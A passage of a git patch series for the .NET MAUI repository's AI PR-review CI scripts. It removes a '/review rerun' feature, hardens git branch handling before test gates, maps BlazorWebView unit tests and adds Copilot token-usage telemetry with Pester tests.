[pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } - } - - if (Test-HasCommitAfter -Commits $Commits -Checkpoint $checkpoint) { - $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-commit-after-previous-rerun' } else { 'new-commit-after-ai-summary' } - return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } - } - - return [pscustomobject]@{ Eligible = $false; Reason = 
'no-new-comments-or-commits'; Label = $ReadyForRerunLabel } -} - -if ($MyInvocation.InvocationName -eq '.') { - return -} - -$issueComments = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'issue-comment' }) -$reviews = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/reviews?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review' }) -$reviewComments = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review-comment' }) -$comments = @($issueComments + $reviews + $reviewComments) -$pr = gh api "repos/$Owner/$Repo/pulls/$PRNumber" | ConvertFrom-Json -$commits = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/commits?per_page=100" --paginate --jq '.[]' | ForEach-Object { $_ | ConvertFrom-Json }) -$labels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) - -if ($pr.state -ne 'open') { - throw "PR #$PRNumber is not open (state: $($pr.state))" -} - -if ($ContextOutputPath) { - $context = New-RerunContextMarkdown ` - -Comments $comments ` - -Commits $commits ` - -CurrentHeadSha $pr.head.sha ` - -CurrentLabels $labels - $contextDir = Split-Path -Parent $ContextOutputPath - if ($contextDir) { - New-Item -ItemType Directory -Force -Path $contextDir | Out-Null - } - $context | Set-Content -LiteralPath $ContextOutputPath -Encoding UTF8 - Write-Host "Wrote rerun context: $ContextOutputPath" - if ($env:GITHUB_OUTPUT) { - "context_output_path=$ContextOutputPath" >> $env:GITHUB_OUTPUT - } - if ($CurrentCommentId -eq 0 -and -not $ApplyLabel) { - exit 0 - } -} - -if ($CurrentCommentId -eq 0) { - throw "CurrentCommentId is required unless only writing ContextOutputPath." 
-} - -$result = Resolve-RerunEligibility ` - -Comments $comments ` - -Commits $commits ` - -CurrentCommentId $CurrentCommentId ` - -CurrentHeadSha $pr.head.sha ` - -CurrentLabels $labels - -Write-Host "Rerun eligibility: $($result.Eligible) ($($result.Reason))" - -if ($env:GITHUB_OUTPUT) { - "eligible=$($result.Eligible.ToString().ToLowerInvariant())" >> $env:GITHUB_OUTPUT - "reason=$($result.Reason)" >> $env:GITHUB_OUTPUT - "label=$($result.Label)" >> $env:GITHUB_OUTPUT -} - -if ($ApplyLabel -and $result.Eligible) { - . "$PSScriptRoot/shared/Update-AgentLabels.ps1" - Ensure-LabelExists ` - -LabelName $ReadyForRerunLabel ` - -Description $ReadyForRerunLabelDescription ` - -Color $ReadyForRerunLabelColor ` - -Owner $Owner ` - -Repo $Repo - - $alreadyPresent = @($labels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - if ($alreadyPresent) { - Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green - } else { - $addSucceeded = Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo - $updatedLabels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) - $labelIsPresent = @($updatedLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - if ($addSucceeded -or $labelIsPresent) { - Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green - } else { - throw "Failed to apply label: $ReadyForRerunLabel" - } - } -} diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 377b11e720d4..575dff836e2b 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1355,35 +1355,6 @@ $gateStatusForPrompt = switch ($gateResult) { default { "Gate ❌ FAILED — tests did NOT behave as expected." 
} } -$rerunContextInstruction = "" -$rerunContextPath = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md" -$rerunContextScript = Join-Path $ScriptsDir "Resolve-RerunEligibility.ps1" -if (Test-Path $rerunContextScript) { - try { - Write-Host "Generating deterministic rerun context..." -ForegroundColor Cyan - & pwsh -NoProfile -File $rerunContextScript ` - -PRNumber $PRNumber ` - -Owner 'dotnet' ` - -Repo 'maui' ` - -ContextOutputPath $rerunContextPath - if ($LASTEXITCODE -eq 0 -and (Test-Path $rerunContextPath)) { - Write-Host " ✅ rerun context: $rerunContextPath" -ForegroundColor Green - $rerunContextInstruction = @" - -## Deterministic rerun context - -Before pre-flight, read ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md`` if it exists. This file is generated without AI and lists new comments/commits since the latest AI Summary or previous ``/review rerun`` checkpoint. - -When the file has new activity, explicitly include a "New activity since previous AI Summary" subsection in ``pre-flight/content.md`` and prioritize that delta when deciding what changed since the previous review. -"@ - } else { - Write-Host " ⚠️ rerun context generation exited with code $LASTEXITCODE" -ForegroundColor Yellow - } - } catch { - Write-Host " ⚠️ rerun context generation failed: $_" -ForegroundColor Yellow - } -} - # Build regression test instruction for try-fix candidates $regressionTestInstruction = "" if ($risksData -and $regressionTests -and $regressionTests.Count -gt 0) { @@ -1417,7 +1388,6 @@ Generate alternative fix candidates for PR #$PRNumber using an iterative expert- ## Phase 1 — Pre-Flight (context only) Use the pr-review skill's pre-flight phase to gather context about the issue and PR. Do NOT modify code. Write summary to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md``. 
-$rerunContextInstruction ## Phase 2 — Iterative Try-Fix loop For each candidate, follow this cycle: diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index f49bed0248b0..cb22f4de9481 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -593,7 +593,7 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" - $authorPing += ' To request a deterministic rerun after new comments or commits, comment `/review rerun`.' + $authorPing += ' To request a fresh review after new comments or commits, comment `/review rerun`.' } $reviewStatus = switch ($reviewEvent) { diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index e963e956c63c..7c2cd59c1d15 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -37,7 +37,6 @@ $script:SignalLabels = @{ $script:ManualLabels = @{ 's/agent-fix-implemented' = @{ Description = 'PR author implemented the agent suggested fix'; Color = '7B1FA2' } - 's/agent-ready-for-rerun' = @{ Description = 'AI review has new PR activity and is ready for rerun'; Color = '5319E7' } } $script:TrackingLabel = @{ @@ -127,19 +126,10 @@ function Add-Label { [string]$Repo = 'maui' ) - $tmp = $null - try { - $tmp = New-TemporaryFile - @{ labels = @($LabelName) } | ConvertTo-Json -Compress | Set-Content -LiteralPath $tmp -Encoding utf8 -NoNewline - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` - --method POST ` - --input $tmp 1>$null 2>$null - return $LASTEXITCODE -eq 0 - } finally { - if ($tmp) { - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue - } - } + gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + --method POST ` + -f "labels[]=$LabelName" 2>$null | Out-Null + return $LASTEXITCODE 
-eq 0 } # ============================================================ @@ -153,8 +143,8 @@ function Remove-Label { [string]$Repo = 'maui' ) - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` - --method DELETE 1>$null 2>$null + gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` + --method DELETE 2>$null | Out-Null return $LASTEXITCODE -eq 0 } diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index c81111252c4f..be5417181a81 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -38,7 +38,6 @@ jobs: timeout-minutes: 2 outputs: matched: ${{ steps.check.outputs.matched }} - command: ${{ steps.check.outputs.command }} steps: - name: Match /review command id: check @@ -47,72 +46,19 @@ jobs: run: | if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=review" >> "$GITHUB_OUTPUT" - exit 0 - fi - TRIMMED_BODY=$(printf '%s' "${COMMENT_BODY}" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//') - if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun$ ]]; then - echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=rerun" >> "$GITHUB_OUTPUT" - exit 0 - fi - if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun([[:space:]]|$) ]]; then - echo "matched=false" >> "$GITHUB_OUTPUT" - echo "command=none" >> "$GITHUB_OUTPUT" exit 0 fi # Match `/review` as the first non-whitespace token, optionally followed by args. # Allows arbitrary leading whitespace (spaces, tabs, newlines). 
if [[ "${COMMENT_BODY}" =~ ^[[:space:]]*/review([[:space:]]|$) ]]; then echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=review" >> "$GITHUB_OUTPUT" else echo "matched=false" >> "$GITHUB_OUTPUT" - echo "command=none" >> "$GITHUB_OUTPUT" fi - mark-rerun-ready: - needs: match - if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'rerun' - runs-on: ubuntu-latest - concurrency: - group: review-rerun-${{ github.event.issue.number }} - cancel-in-progress: false - timeout-minutes: 5 - permissions: - contents: read - issues: write - pull-requests: write - steps: - - name: Checkout repository scripts - uses: actions/checkout@v4 - with: - persist-credentials: false - - - name: Determine rerun eligibility and apply label - id: rerun - env: - GH_TOKEN: ${{ github.token }} - shell: pwsh - run: | - .github/scripts/Resolve-RerunEligibility.ps1 ` - -Owner '${{ github.repository_owner }}' ` - -Repo '${{ github.event.repository.name }}' ` - -PRNumber ${{ github.event.issue.number }} ` - -CurrentCommentId ${{ github.event.comment.id }} ` - -ApplyLabel - - - name: Summarize rerun decision - shell: pwsh - run: | - "### /review rerun" >> $env:GITHUB_STEP_SUMMARY - "Eligible: ${{ steps.rerun.outputs.eligible }}" >> $env:GITHUB_STEP_SUMMARY - "Reason: ${{ steps.rerun.outputs.reason }}" >> $env:GITHUB_STEP_SUMMARY - "Label: ${{ steps.rerun.outputs.label }}" >> $env:GITHUB_STEP_SUMMARY - trigger-review: needs: match - if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'review' + if: needs.match.outputs.matched == 'true' runs-on: ubuntu-latest concurrency: group: review-trigger-${{ github.event.issue.number || inputs.pr_number }} From 22636b978c56e563ede83b9a4de04f90019bc5ce Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:56:17 +0200 Subject: [PATCH 29/34] Commit squashed PR changes before gate Ensure setup stages all squash-merge output before committing and later phases 
reattach to the review branch before running. This prevents verify-tests-fail from seeing PR fix files as uncommitted during Gate. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 575dff836e2b..24bd2b630397 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -302,6 +302,16 @@ if ($DryRun) { Write-Host " 🔀 Merging PR commits (squashed)..." -ForegroundColor Cyan git merge --squash $tempBranch 2>&1 | Out-Null if ($LASTEXITCODE -eq 0) { + # Ensure both staged and unstaged merge output is committed. Some + # squash merges can leave tracked files modified in the worktree rather + # than only staged; Gate later requires fix files to be committed so it + # can restore them with `git checkout HEAD`. + git add -A 2>&1 | Out-Null + if ($LASTEXITCODE -ne 0) { + git branch -D $tempBranch 2>$null + Write-Error "Failed to stage squashed PR changes"; exit 1 + } + # Check if there's anything to commit (PR might already be merged) $staged = git diff --cached --quiet 2>$null; $hasStagedChanges = $LASTEXITCODE -ne 0 if ($hasStagedChanges) { @@ -315,6 +325,14 @@ if ($DryRun) { Write-Host " ⚠️ No changes to merge (PR may already be up to date)" -ForegroundColor Yellow } + git diff --quiet 2>$null; $hasWorktreeChanges = $LASTEXITCODE -ne 0 + git diff --cached --quiet 2>$null; $hasIndexChanges = $LASTEXITCODE -ne 0 + if ($hasWorktreeChanges -or $hasIndexChanges) { + git status --short # list the dirty files first: Write-Error terminates under ErrorActionPreference Stop
+ Write-Error "Review branch has uncommitted tracked changes after setup. Gate cannot proceed safely." + exit 1 + } + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { Remove-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` @@ -393,6 +411,19 @@ if ($Phase -and $Phase -ne 'Setup') { Write-Error "Setup phase did not complete (sentinel not found at '$sentinelFile'). Cannot proceed with -Phase $Phase." exit 1 } + + if (-not $DryRun) { + git checkout $reviewBranch 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to checkout review branch '$reviewBranch' before -Phase $Phase." + exit 1 + } + git reset --hard HEAD 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to reset review branch '$reviewBranch' before -Phase $Phase." + exit 1 + } + } } # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── From 37918600b3e2f0a72d8ce3c7ede4641f19bd1f90 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:58:22 +0200 Subject: [PATCH 30/34] Reset review branch before gate retries Restore the committed review branch before each gate verification attempt so a crashed without-fix attempt cannot leave fix files reverted and make the next retry fail with uncommitted changes. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 24bd2b630397..ff07386cc176 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1089,6 +1089,22 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { if ($gateAttempt -gt 1) { Write-Host " 🔄 Retry $gateAttempt/$maxGateAttempts — previous attempt hit environment error" -ForegroundColor Yellow } + if (-not $DryRun) { + # Each verification attempt mutates fix files while testing the without-fix + # state.
If an attempt aborts before restoring those files, retries must + # start from the committed review branch or they fail immediately with + # "uncommitted changes detected in fix files". + git checkout $reviewBranch 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to checkout review branch '$reviewBranch' before gate attempt $gateAttempt." + exit 1 + } + git reset --hard HEAD 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to reset review branch '$reviewBranch' before gate attempt $gateAttempt." + exit 1 + } + } # Clear previous attempt's report so a crash mid-run doesn't leak its classification into this one. Remove-Item $gateContentFile -Force -ErrorAction SilentlyContinue # Note: -RequireFullVerification is intentionally OMITTED. The verify script From a80f23e33073de10dde179656b6bfeb3fb052a44 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 16:04:30 +0200 Subject: [PATCH 31/34] Fix BlazorWebView unit test detection Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/shared/Detect-TestsInDiff.ps1 | 2 ++ .../verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 | 1 + 2 files changed, 3 insertions(+) diff --git a/.github/scripts/shared/Detect-TestsInDiff.ps1 b/.github/scripts/shared/Detect-TestsInDiff.ps1 index b7a141d4e034..daf638970163 100644 --- a/.github/scripts/shared/Detect-TestsInDiff.ps1 +++ b/.github/scripts/shared/Detect-TestsInDiff.ps1 @@ -107,6 +107,7 @@ $UnitTestProjects = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/" "Core.UnitTests" = "src/Core/tests/UnitTests/" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/" "Compatibility.Core.UnitTests" = 
"src/Compatibility/Core/tests/Compatibility.UnitTests/" @@ -120,6 +121,7 @@ $UnitTestProjectPaths = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/SourceGen.UnitTests.csproj" "Core.UnitTests" = "src/Core/tests/UnitTests/Core.UnitTests.csproj" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/Essentials.UnitTests.csproj" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/MauiBlazorWebView.UnitTests.csproj" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/Graphics.Tests.csproj" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/Resizetizer.UnitTests.csproj" "Compatibility.Core.UnitTests" = "src/Compatibility/Core/tests/Compatibility.UnitTests/Compatibility.Core.UnitTests.csproj" diff --git a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 index e54d900a1cf1..333f8c7bde11 100644 --- a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 +++ b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 @@ -210,6 +210,7 @@ $script:UnitTestProjectMap = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/SourceGen.UnitTests.csproj" "Core.UnitTests" = "src/Core/tests/UnitTests/Core.UnitTests.csproj" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/Essentials.UnitTests.csproj" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/MauiBlazorWebView.UnitTests.csproj" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/Graphics.Tests.csproj" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/Resizetizer.UnitTests.csproj" "Compatibility.Core.UnitTests" = "src/Compatibility/Core/tests/Compatibility.UnitTests/Compatibility.Core.UnitTests.csproj" From 9fb6a047935ebce83792784799c3cc656795e24b Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: 
Fri, 5 Jun 2026 13:36:40 +0200 Subject: [PATCH 32/34] Add Copilot token usage artifacts Capture Copilot CLI usage metadata during review runs, aggregate it into all-stage summaries, and publish a dedicated CopilotTokenUsage artifact from ci-copilot. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-CopilotTokenUsage.Tests.ps1 | 82 ++++ .github/scripts/Review-PR.Tests.ps1 | 64 ++++ .github/scripts/Review-PR.ps1 | 272 +++++++++++++- .../shared/Aggregate-CopilotTokenUsage.ps1 | 355 ++++++++++++++++++ eng/pipelines/ci-copilot.yml | 65 ++++ 5 files changed, 837 insertions(+), 1 deletion(-) create mode 100644 .github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 create mode 100644 .github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 diff --git a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 new file mode 100644 index 000000000000..f4b7138f36bb --- /dev/null +++ b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 @@ -0,0 +1,82 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for Aggregate-CopilotTokenUsage.ps1. 
+#> + +Describe 'Aggregate-CopilotTokenUsage.ps1' { + BeforeEach { + $script:fixtureRoot = Join-Path ([System.IO.Path]::GetTempPath()) "token-usage-fixtures-$([guid]::NewGuid())" + $script:inputRoot = Join-Path $script:fixtureRoot 'input' + $script:outputRoot = Join-Path $script:fixtureRoot 'output' + New-Item -ItemType Directory -Path $script:inputRoot -Force | Out-Null + } + + AfterEach { + Remove-Item -Path $script:fixtureRoot -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'writes raw and summarized artifacts with zero rows for stages without Copilot invocations' { + $nested = Join-Path $script:inputRoot 'CopilotLogs/copilot-token-usage/raw' + New-Item -ItemType Directory -Path $nested -Force | Out-Null + + [ordered]@{ + schemaVersion = 1 + prNumber = 35677 + pipeline = [ordered]@{ stageName = 'ReviewPR' } + scriptPhase = 'CopilotReview' + copilotStep = 'STEP 5a: TRY-FIX' + model = 'gpt-5.5' + durationMs = 5000 + apiDurationMs = 2000 + turnCount = 2 + toolCount = 3 + normalizedTokens = [ordered]@{ + inputTokens = 100 + outputTokens = 40 + cachedInputTokens = 10 + totalTokens = 140 + } + } | ConvertTo-Json -Depth 10 | Set-Content (Join-Path $nested 'copilot-token-usage-a.json') -Encoding UTF8 + + $scriptPath = Join-Path $PSScriptRoot 'shared/Aggregate-CopilotTokenUsage.ps1' + & $scriptPath ` + -InputRoot $script:inputRoot ` + -OutputDir $script:outputRoot ` + -PRNumber '35677' ` + -ExpectedStages @('ReviewPR', 'RunDeepUITests', 'UpdateAISummaryComment', 'AnalyzeCopilotTokenUsage') + + Test-Path (Join-Path $script:outputRoot 'token-usage-raw.jsonl') | Should -Be $true + Test-Path (Join-Path $script:outputRoot 'token-usage-summary.md') | Should -Be $true + Test-Path (Join-Path $script:outputRoot 'token-usage-by-step.csv') | Should -Be $true + + $summary = Get-Content (Join-Path $script:outputRoot 'token-usage-summary.json') -Raw | ConvertFrom-Json + $summary.recordCount | Should -Be 1 + $summary.totals.inputTokens | Should -Be 100 + 
$summary.totals.outputTokens | Should -Be 40 + $summary.totals.totalTokens | Should -Be 140 + + $reviewStage = $summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' } + $reviewStage.invocationCount | Should -Be 1 + $reviewStage.totalTokens | Should -Be 140 + + $deepStage = $summary.stages | Where-Object { $_.stageName -eq 'RunDeepUITests' } + $deepStage.invocationCount | Should -Be 0 + $deepStage.totalTokens | Should -Be 0 + $deepStage.note | Should -Be 'No Copilot invocation observed in this stage.' + } + + It 'emits a no-record summary when the input artifact is missing' { + $scriptPath = Join-Path $PSScriptRoot 'shared/Aggregate-CopilotTokenUsage.ps1' + & $scriptPath ` + -InputRoot (Join-Path $script:fixtureRoot 'missing') ` + -OutputDir $script:outputRoot ` + -PRNumber '35677' + + $summary = Get-Content (Join-Path $script:outputRoot 'token-usage-summary.json') -Raw | ConvertFrom-Json + $summary.recordCount | Should -Be 0 + ($summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' }).invocationCount | Should -Be 0 + Test-Path (Join-Path $script:outputRoot 'token-usage-by-step.csv') | Should -Be $true + } +} diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 3d94ccc038ca..934724a2e8bf 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -7,6 +7,7 @@ - Get-TrxResults (parses VSTest TRX produced by `dotnet test --logger trx`) - Get-DotNetTestResults (legacy console-output scraper, still used as fallback when TRX is missing) + - Copilot token usage helpers These functions sit on the critical path of STEP 3 (UI Test Execution Results in the AI summary review). 
A regression here can silently @@ -41,6 +42,69 @@ BeforeAll { Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TrxResults') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-DotNetTestResults') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Test-IsNumericValue') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-ObjectMemberValue') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotUsageTokenFields') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TokenFieldSum') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotTokenMetrics') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'New-CopilotTokenUsageRecord') +} + +Describe 'Copilot token usage helpers' { + It 'normalizes known token fields while preserving raw token field paths' { + $usage = [pscustomobject]@{ + inputTokens = 100 + outputTokens = 40 + totalApiDurationMs = 1234 + nested = [pscustomobject]@{ + cachedInputTokens = 12 + } + } + + $metrics = Get-CopilotTokenMetrics -Usage $usage + + $metrics.inputTokens | Should -Be 100 + $metrics.outputTokens | Should -Be 40 + $metrics.cachedInputTokens | Should -Be 12 + $metrics.totalTokens | Should -Be 140 + @($metrics.rawTokenFields).Count | Should -Be 3 + @($metrics.rawTokenFields | Where-Object { $_.Path -eq 'nested.cachedInputTokens' }).Count | Should -Be 1 + } + + It 'builds a telemetry record with raw usage and no hardcoded cost estimate' { + $usage = [pscustomobject]@{ + prompt_tokens = 25 + completion_tokens = 15 + total_tokens = 45 + totalApiDurationMs = 2000 + } + + $record = New-CopilotTokenUsageRecord ` + -PRNumber 35677 ` + -Platform 'android' ` + -Phase 'CopilotReview' ` + -StepName 'STEP 5a: TRY-FIX' ` + -ModelName 'gpt-5.5' ` + -StartedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:00Z')) ` + -EndedAtUtc 
([DateTimeOffset]::Parse('2026-06-05T10:00:05Z')) ` + -DurationMs 5000 ` + -TurnCount 2 ` + -ToolCount 3 ` + -FailedToolCount 1 ` + -Usage $usage ` + -ResultEventSeen $true ` + -ExitCode 0 + + $record.prNumber | Should -Be 35677 + $record.scriptPhase | Should -Be 'CopilotReview' + $record.copilotStep | Should -Be 'STEP 5a: TRY-FIX' + $record.apiDurationMs | Should -Be 2000 + $record.normalizedTokens.inputTokens | Should -Be 25 + $record.normalizedTokens.outputTokens | Should -Be 15 + $record.normalizedTokens.totalTokens | Should -Be 45 + $record.usage.total_tokens | Should -Be 45 + $record.costEstimateAvailable | Should -Be $false + } } Describe 'Get-TrxResults' { diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index ff07386cc176..3c672e82d089 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -37,6 +37,9 @@ .PARAMETER LogFile Capture all output via Start-Transcript +.PARAMETER TokenUsageOutputDir + Directory where Copilot CLI token-usage telemetry records should be written. + .EXAMPLE .\Review-PR.ps1 -PRNumber 33687 .\Review-PR.ps1 -PRNumber 33687 -Platform ios @@ -66,7 +69,10 @@ param( [switch]$DryRun, [Parameter(Mandatory = $false)] - [string]$LogFile + [string]$LogFile, + + [Parameter(Mandatory = $false)] + [string]$TokenUsageOutputDir ) $ErrorActionPreference = 'Stop' @@ -174,6 +180,10 @@ $autonomousRules = @" $reviewBranch = "pr-review-$PRNumber" +if ([string]::IsNullOrWhiteSpace($TokenUsageOutputDir)) { + $TokenUsageOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/token-usage/raw" +} + # ─── Prerequisites ──────────────────────────────────────────────────────────── if ($runSetup) { Write-Host "📋 Checking prerequisites..." 
-ForegroundColor Yellow @@ -584,6 +594,240 @@ function Get-TrxResults { } } +# ─── Helper: Copilot token usage telemetry ──────────────────────────────────── +function Test-IsNumericValue { + param([object]$Value) + + return ( + $Value -is [byte] -or + $Value -is [sbyte] -or + $Value -is [int16] -or + $Value -is [uint16] -or + $Value -is [int] -or + $Value -is [uint32] -or + $Value -is [long] -or + $Value -is [uint64] -or + $Value -is [float] -or + $Value -is [double] -or + $Value -is [decimal] + ) +} + +function Get-ObjectMemberValue { + param( + [object]$InputObject, + [string[]]$Names + ) + + if ($null -eq $InputObject) { return $null } + + foreach ($name in $Names) { + if ($InputObject -is [System.Collections.IDictionary] -and $InputObject.Contains($name)) { + return $InputObject[$name] + } + + $property = $InputObject.PSObject.Properties[$name] + if ($property) { + return $property.Value + } + } + + return $null +} + +function Get-CopilotUsageTokenFields { + param( + [object]$Value, + [string]$Path = '' + ) + + $fields = New-Object System.Collections.ArrayList + if ($null -eq $Value) { return @() } + + if (Test-IsNumericValue $Value) { + if ($Path -match '(?i)token') { + [void]$fields.Add([ordered]@{ + Path = $Path + Value = [double]$Value + }) + } + return @($fields.ToArray()) + } + + if ($Value -is [string]) { return @() } + + if ($Value -is [System.Collections.IDictionary]) { + foreach ($key in $Value.Keys) { + $childPath = if ($Path) { "$Path.$key" } else { [string]$key } + foreach ($field in Get-CopilotUsageTokenFields -Value $Value[$key] -Path $childPath) { + [void]$fields.Add($field) + } + } + return @($fields.ToArray()) + } + + if ($Value -is [System.Collections.IEnumerable]) { + $index = 0 + foreach ($item in $Value) { + $childPath = if ($Path) { "$Path[$index]" } else { "[$index]" } + foreach ($field in Get-CopilotUsageTokenFields -Value $item -Path $childPath) { + [void]$fields.Add($field) + } + $index++ + } + return @($fields.ToArray()) + } + + 
